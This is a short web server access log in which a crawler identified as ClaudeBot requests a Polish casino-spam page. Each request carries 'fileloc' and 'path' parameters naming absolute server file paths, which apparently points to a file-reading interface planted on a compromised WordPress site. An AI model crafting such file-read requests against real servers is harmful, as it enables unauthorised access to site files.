216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flist%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flist HTTP/2" 200 2905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2927 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:35 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flist%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flist HTTP/2" 200 2908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:35 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-title%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-title HTTP/2" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:36 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Ftheme-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:36 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts HTTP/2" 200 3290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:35 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-title%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-title HTTP/2" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:35 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part%2Ftheme-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part HTTP/2" 200 2916 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:36 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph%2Fstyle-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph HTTP/2" 200 3098 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:43 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Flib%2Fconstants.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Flib HTTP/2" 200 3391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:44 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-terms%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-terms HTTP/2" 200 2916 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:45:43 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-comments%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-comments HTTP/2" 200 3168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
